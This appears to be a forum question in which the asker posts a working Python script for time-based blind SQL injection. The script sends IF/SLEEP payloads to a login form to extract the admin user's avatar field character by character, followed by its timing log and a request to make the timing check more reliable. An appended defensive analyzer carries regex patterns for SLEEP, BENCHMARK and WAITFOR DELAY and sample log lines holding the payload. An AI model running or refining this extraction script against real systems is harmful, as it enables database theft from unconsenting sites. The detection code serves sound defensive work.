Reputation: 1542
I'm trying to simulate SQLMap exploiting a time-based SQL injection.
import string
import time
import requests

# url, headers and cookies are defined earlier in the script (not shown here)
resultado = ""
listaCaracteres = string.ascii_letters + string.digits + "._-@/"
delay = 5
tamanhoCampo = 30
for i in range(1, tamanhoCampo + 1):
    caracterEncontrado = False
    for caracter in listaCaracteres:
        data = {
            "username": f"teste' OR IF((SELECT substring(avatar,{i},1) FROM users WHERE username='admin')='{caracter}',SLEEP({delay}),1)#",
            "password": "teste"
        }
        startTime = time.time()
        try:
            # print(f"[+] Starting request - position {i} character {caracter}")
            resp = requests.post(url, headers=headers, cookies=cookies, data=data)
        except Exception as e:
            print(e)
        endTime = time.time()
        # elapsed wall-clock time of the request; compared against the SLEEP() delay below
        tempoTotal = endTime - startTime
        print(f"[*] Pos. {i} {caracter} {tempoTotal}")
        if tempoTotal >= delay:
            print(f"[+] Caracter encontrado {caracter} {tempoTotal}")
            resultado += caracter
            caracterEncontrado = True
            delay = 5
            break
    if not caracterEncontrado:
        delay += 1
        print(f"[*] Caracter não encontrado, aumentando o tempo de resposta para {delay} segundos")
print(resultado)
Debugging the results
[*] Iniciando o DUMP.
[*] Pos. 1 a 0.41757917404174805
[*] Pos. 1 b 0.42841196060180664
[*] Pos. 1 c 0.42807817459106445
[*] Pos. 1 d 1.420304536819458
[*] Pos. 1 e 0.4183344841003418
[*] Pos. 1 f 0.4205491542816162
[*] Pos. 1 g 0.41797685623168945
[*] Pos. 1 h 0.41671323776245117
[*] Pos. 1 i 0.41751718521118164
[*] Pos. 1 j 0.4145169258117676
[*] Pos. 1 k 0.4157712459564209
[*] Pos. 1 l 0.4163017272949219
[*] Pos. 1 m 0.41348886489868164
[*] Pos. 1 n 0.4273350238800049
[*] Pos. 1 o 0.42464113235473633
[*] Pos. 1 p 0.4265732765197754
[*] Pos. 1 q 0.4321424961090088
[*] Pos. 1 r 0.4281890392303467
[*] Pos. 1 s 0.41872739791870117
[*] Pos. 1 t 0.41807007789611816
[*] Pos. 1 u 4.920653581619263
[*] Pos. 1 v 0.41268229484558105
[*] Pos. 1 w 0.47426342964172363
[*] Pos. 1 x 0.4102909564971924
[*] Pos. 1 y 0.41750526428222656
[*] Pos. 1 z 0.41268014907836914
[*] Pos. 1 A 0.412386417388916
[*] Pos. 1 B 0.4086577892303467
[*] Pos. 1 C 0.41196632385253906
Pos. 1 letter u gives almost 5 seconds, actually 4.9; that's exactly the first character of the avatar field that I'm looking for. Each script execution gives me 4.9 or more than 5 secs, so sometimes this goes into the first condition and sometimes not!
So, how can I calculate this more accurately?
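Seen from the application owner's side, the same timing signal the script relies on is what tells a defender whether an injected SLEEP() actually ran. Added example, not code from the question: an analyzer over a constructed JSON-lines login audit log that groups time-delay payloads per source IP and marks those whose measured duration reached the requested sleep (the log format, field names and sample values are assumptions).

```python
import json
import re

# Constructed sample of a login-endpoint audit log (JSON lines), not taken from the
# question. "duration" is the server-side request time in seconds.
SAMPLE_LOG = """\
{"ts": "2024-01-01T10:00:00Z", "src": "203.0.113.5", "username": "alice", "duration": 0.41}
{"ts": "2024-01-01T10:00:01Z", "src": "203.0.113.5", "username": "teste' OR IF((SELECT substring(avatar,1,1) FROM users WHERE username='admin')='a',SLEEP(5),1)#", "duration": 0.42}
{"ts": "2024-01-01T10:00:02Z", "src": "203.0.113.5", "username": "teste' OR IF((SELECT substring(avatar,1,1) FROM users WHERE username='admin')='b',SLEEP(5),1)#", "duration": 0.43}
{"ts": "2024-01-01T10:00:08Z", "src": "203.0.113.5", "username": "teste' OR IF((SELECT substring(avatar,1,1) FROM users WHERE username='admin')='u',SLEEP(5),1)#", "duration": 4.92}
{"ts": "2024-01-01T10:00:09Z", "src": "198.51.100.7", "username": "bob", "duration": 0.39}
"""

# Time-delay primitives used by blind SQLi on common engines (case-insensitive).
SLEEP_CALL = re.compile(r"\b(?:SLEEP|PG_SLEEP)\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
OTHER_DELAY = re.compile(r"\bBENCHMARK\s*\(|\bWAITFOR\s+DELAY\b", re.I)

def requested_delay(value: str):
    """Seconds a payload asks the database to sleep; 0.0 for a delay primitive whose
    length is not parsed (BENCHMARK, WAITFOR); None if there is no delay primitive."""
    m = SLEEP_CALL.search(value)
    if m:
        return float(m.group(1))
    return 0.0 if OTHER_DELAY.search(value) else None

def analyze(log_text: str, tolerance: float = 0.8):
    """Group time-based SQLi attempts per source and mark those the server executed.

    An attempt is 'confirmed' when the duration reached tolerance * requested delay:
    a SLEEP(5) that really ran comes back after ~5 s (4.92 s in the question), while a
    safely parameterised input returns in the normal ~0.4 s."""
    findings = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        delay = requested_delay(rec.get("username", ""))
        if delay is None:
            continue
        entry = findings.setdefault(rec["src"], {"first_ts": rec["ts"], "attempts": 0, "confirmed": 0})
        entry["attempts"] += 1
        if delay > 0 and rec["duration"] >= tolerance * delay:
            entry["confirmed"] += 1
    return findings

if __name__ == "__main__":
    for src, f in analyze(SAMPLE_LOG).items():
        status = "EXECUTED (endpoint is injectable)" if f["confirmed"] else "attempted only"
        print(f"{src}: {f['attempts']} time-delay payloads since {f['first_ts']} -> {status}")
```

A source with confirmed entries is the one to escalate: the delay ran inside the database, so the login query is concatenating user input.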
Upvotes: 0
Views: 57